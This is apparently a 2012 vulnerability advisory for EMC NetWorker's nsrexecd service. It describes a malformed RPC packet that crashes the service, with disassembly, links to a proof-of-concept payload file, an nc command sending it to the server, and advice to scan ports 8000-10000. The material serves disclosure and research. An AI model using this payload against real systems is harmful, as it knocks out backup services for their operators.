####################################################################### Luigi Auriemma Application: EMC NetWorker (Legato) http://www.emc.com/backup-and-recovery/networker/networker.htm Versions: <= 7.6 sp3 (7.6.3.2 Build 860) Platforms: AIX, HP-UX, Linux, Solaris, Windows Bug: invalid read access Exploitation: remote Date: 14 Mar 2012 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== From vendor's homepage: "EMC NetWorker backup and recovery software centralizes, automates, and accelerates data backup and recovery across your IT environment. NetWorker delivers record-breaking performance and a wide range of data protection options to safeguard your critical business data." ####################################################################### ====== 2) Bug ====== nsrexecd is a service listening on some default ports (like 111, 7937 and 7938) plus another couple of random ones usually over port 8000. Through a malformed RPC packet sent to one these random ports it's possible to crash the service due to the hash calculation performed over an arbitrary amount of data. From librpc.dll: 0038B3CF 8B4424 3C MOV EAX,DWORD PTR SS:[ESP+3C] ; my_size 0038B3D3 8B6D 00 MOV EBP,DWORD PTR SS:[EBP] 0038B3D6 2BF0 SUB ESI,EAX 0038B3D8 897424 38 MOV DWORD PTR SS:[ESP+38],ESI 0038B3DC 8B33 MOV ESI,DWORD PTR DS:[EBX] ; size 0038B3DE 8B9C24 90000000 MOV EBX,DWORD PTR SS:[ESP+90] 0038B3E5 2BF0 SUB ESI,EAX ; size - my_size 0038B3E7 8B43 10 MOV EAX,DWORD PTR DS:[EBX+10] 0038B3EA 50 PUSH EAX 0038B3EB 8D4C24 3C LEA ECX,DWORD PTR SS:[ESP+3C] 0038B3EF 51 PUSH ECX 0038B3F0 8D5424 48 LEA EDX,DWORD PTR SS:[ESP+48] 0038B3F4 52 PUSH EDX 0038B3F5 2BF7 SUB ESI,EDI 0038B3F7 53 PUSH EBX 0038B3F8 897424 54 MOV DWORD PTR SS:[ESP+54],ESI ; the new size 0038B3FC 896C24 50 MOV DWORD PTR SS:[ESP+50],EBP ... 0038AFC5 8D4C24 0C LEA ECX,DWORD PTR SS:[ESP+C] 0038AFC9 51 PUSH ECX 0038AFCA 8B4C24 1C MOV ECX,DWORD PTR SS:[ESP+1C] 0038AFCE 8D5424 0C LEA EDX,DWORD PTR SS:[ESP+C] 0038AFD2 52 PUSH EDX 0038AFD3 8B51 04 MOV EDX,DWORD PTR DS:[ECX+4] ; new size 0038AFD6 8B09 MOV ECX,DWORD PTR DS:[ECX] 0038AFD8 52 PUSH EDX 0038AFD9 8B5424 2C MOV EDX,DWORD PTR SS:[ESP+2C] 0038AFDD 51 PUSH ECX 0038AFDE 8B48 20 MOV ECX,DWORD PTR DS:[EAX+20] 0038AFE1 52 PUSH EDX 0038AFE2 8B50 1C MOV EDX,DWORD PTR DS:[EAX+1C] 0038AFE5 51 PUSH ECX 0038AFE6 52 PUSH EDX 0038AFE7 E8 04E3FFFF CALL LIBRPC.cryptoiface_get_hmac ; hash crash Note: after the crash it's necessary to restart also the other services so that the situation can return normal and the bug can be tested again. ####################################################################### =========== 3) The Code =========== http://aluigi.org/poc/nsrexecd_1.dat https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18601.dat nc SERVER PORT < nsrexecd_1.dat it's enough to scan all the ports from 8000 to 10000 to catch the correct one automatically. ####################################################################### ====== 4) Fix ====== No fix. #######################################################################